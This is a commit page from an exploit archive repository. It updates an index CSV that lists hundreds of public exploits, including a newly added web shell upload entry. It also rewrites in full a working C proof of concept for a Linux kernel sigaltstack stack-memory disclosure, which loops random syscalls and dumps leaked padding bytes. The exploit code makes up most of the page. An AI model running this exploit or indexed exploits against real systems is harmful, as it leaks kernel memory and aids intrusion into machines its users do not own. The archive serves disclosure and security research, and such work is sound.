Skip to content

Commit 207c9ba

Browse files
author
Offensive Security
committed
DB: 2016-02-18
2 new exploits
1 parent cc85807 commit 207c9ba

5 files changed

Lines changed: 391 additions & 274 deletions

File tree

files.csv

Lines changed: 9 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
88258825
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
88268826
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
88278827
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
8828-
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
8828+
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
88298829
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
88308830
9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
88318831
9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@@ -8978,15 +8978,15 @@ id,file,description,date,author,platform,type,port
89788978
9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
89798979
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
89808980
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
8981-
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
8981+
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
89828982
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
89838983
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
89848984
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
89858985
9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS Vuln",2009-08-25,"Francis Provencher",windows,dos,0
89868986
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
89878987
9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
89888988
9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
8989-
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
8989+
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
89908990
9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
89918991
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
89928992
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
1318613186
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
1318713187
15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
1318813188
15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
13189-
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
13189+
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
1319013190
15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
1319113191
15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
1319213192
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
1836318363
21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
1836418364
21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
1836518365
21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
18366-
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
18367-
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
18366+
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
18367+
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
1836818368
21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
1836918369
21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
1837018370
21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
2922829228
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
2922929229
32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
2923029230
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
29231-
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
29231+
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
2923229232
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
2923329233
32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
2923429234
32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
3569435694
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
3569535695
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
3569635696
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
35697+
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
35698+
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80

platforms/linux/local/9352.c

Lines changed: 121 additions & 121 deletions
Original file line numberDiff line numberDiff line change
@@ -1,121 +1,121 @@
1-
/*
2-
* sigaltstack-leak.c
3-
*
4-
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
5-
* Jon Oberheide <jon@oberheide.org>
6-
* http://jon.oberheide.org
7-
*
8-
* Information:
9-
*
10-
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
11-
*
12-
* Ulrich Drepper correctly points out that there is generally padding in
13-
* the structure on 64-bit hosts, and that copying the structure from
14-
* kernel to user space can leak information from the kernel stack in those
15-
* padding bytes.
16-
*
17-
* Notes:
18-
*
19-
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
20-
* between stack_t's ss_flags and ss_size. The disclosure only affects
21-
* affects 64-bit hosts.
22-
*/
23-
24-
#include <stdio.h>
25-
#include <stddef.h>
26-
#include <stdlib.h>
27-
#include <string.h>
28-
#include <signal.h>
29-
#include <unistd.h>
30-
#include <time.h>
31-
#include <sys/syscall.h>
32-
#include <sys/types.h>
33-
34-
const int randcalls[] = {
35-
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
36-
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
37-
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
38-
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
39-
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
40-
};
41-
42-
void
43-
dump(const unsigned char *p, unsigned l)
44-
{
45-
printf("stack_t:");
46-
while (l > 0) {
47-
printf(" ");
48-
if (l == 12) {
49-
printf("*** ");
50-
}
51-
printf("%02x", *p);
52-
if (l == 9) {
53-
printf(" ***");
54-
}
55-
++p; --l;
56-
}
57-
printf("\n");
58-
}
59-
60-
int
61-
main(void)
62-
{
63-
char *p;
64-
int call, ret;
65-
size_t size, ftest, stest;
66-
stack_t oss;
67-
68-
size = sizeof(stack_t);
69-
70-
printf("[+] Checking platform...\n");
71-
72-
if (size == 24) {
73-
printf("[+] sizeof(stack_t) = %zu\n", size);
74-
printf("[+] Correct size, 64-bit platform.\n");
75-
} else {
76-
printf("[-] sizeof(stack_t) = %zu\n", size);
77-
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
78-
printf("[-] No information disclosure is possible.\n");
79-
exit(1);
80-
}
81-
82-
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
83-
stest = offsetof(stack_t, ss_size);
84-
85-
printf("[+] Checking for stack_t hole...\n");
86-
87-
if (ftest != stest) {
88-
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
89-
printf("[+] Hole in stack_t present!\n", ftest, stest);
90-
} else {
91-
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
92-
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
93-
exit(1);
94-
}
95-
96-
printf("[+] Ready to call sigaltstack.\n\n");
97-
98-
for (ret = 5; ret > 0; ret--) {
99-
printf("%d...\n", ret);
100-
sleep(1);
101-
}
102-
srand(time(NULL));
103-
104-
while (1) {
105-
/* random stuff to make stack pseudo-interesting */
106-
call = rand() % (sizeof(randcalls) / sizeof(int));
107-
syscall(randcalls[call]);
108-
109-
ret = sigaltstack(NULL, &oss);
110-
if (ret != 0) {
111-
printf("[-] Error: sigaltstack failed.\n");
112-
exit(1);
113-
}
114-
115-
dump((unsigned char *) &oss, sizeof(oss));
116-
}
117-
118-
return 0;
119-
}
120-
121-
// milw0rm.com [2009-08-04]
1+
/*
2+
* sigaltstack-leak.c
3+
*
4+
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
5+
* Jon Oberheide <jon@oberheide.org>
6+
* http://jon.oberheide.org
7+
*
8+
* Information:
9+
*
10+
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
11+
*
12+
* Ulrich Drepper correctly points out that there is generally padding in
13+
* the structure on 64-bit hosts, and that copying the structure from
14+
* kernel to user space can leak information from the kernel stack in those
15+
* padding bytes.
16+
*
17+
* Notes:
18+
*
19+
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
20+
* between stack_t's ss_flags and ss_size. The disclosure only affects
21+
* affects 64-bit hosts.
22+
*/
23+
24+
#include <stdio.h>
25+
#include <stddef.h>
26+
#include <stdlib.h>
27+
#include <string.h>
28+
#include <signal.h>
29+
#include <unistd.h>
30+
#include <time.h>
31+
#include <sys/syscall.h>
32+
#include <sys/types.h>
33+
34+
const int randcalls[] = {
35+
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
36+
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
37+
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
38+
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
39+
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
40+
};
41+
42+
void
43+
dump(const unsigned char *p, unsigned l)
44+
{
45+
printf("stack_t:");
46+
while (l > 0) {
47+
printf(" ");
48+
if (l == 12) {
49+
printf("*** ");
50+
}
51+
printf("%02x", *p);
52+
if (l == 9) {
53+
printf(" ***");
54+
}
55+
++p; --l;
56+
}
57+
printf("\n");
58+
}
59+
60+
int
61+
main(void)
62+
{
63+
char *p;
64+
int call, ret;
65+
size_t size, ftest, stest;
66+
stack_t oss;
67+
68+
size = sizeof(stack_t);
69+
70+
printf("[+] Checking platform...\n");
71+
72+
if (size == 24) {
73+
printf("[+] sizeof(stack_t) = %zu\n", size);
74+
printf("[+] Correct size, 64-bit platform.\n");
75+
} else {
76+
printf("[-] sizeof(stack_t) = %zu\n", size);
77+
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
78+
printf("[-] No information disclosure is possible.\n");
79+
exit(1);
80+
}
81+
82+
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
83+
stest = offsetof(stack_t, ss_size);
84+
85+
printf("[+] Checking for stack_t hole...\n");
86+
87+
if (ftest != stest) {
88+
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
89+
printf("[+] Hole in stack_t present!\n", ftest, stest);
90+
} else {
91+
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
92+
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
93+
exit(1);
94+
}
95+
96+
printf("[+] Ready to call sigaltstack.\n\n");
97+
98+
for (ret = 5; ret > 0; ret--) {
99+
printf("%d...\n", ret);
100+
sleep(1);
101+
}
102+
srand(time(NULL));
103+
104+
while (1) {
105+
/* random stuff to make stack pseudo-interesting */
106+
call = rand() % (sizeof(randcalls) / sizeof(int));
107+
syscall(randcalls[call]);
108+
109+
ret = sigaltstack(NULL, &oss);
110+
if (ret != 0) {
111+
printf("[-] Error: sigaltstack failed.\n");
112+
exit(1);
113+
}
114+
115+
dump((unsigned char *) &oss, sizeof(oss));
116+
}
117+
118+
return 0;
119+
}
120+
121+
// milw0rm.com [2009-08-04]

0 commit comments

Comments
 (0)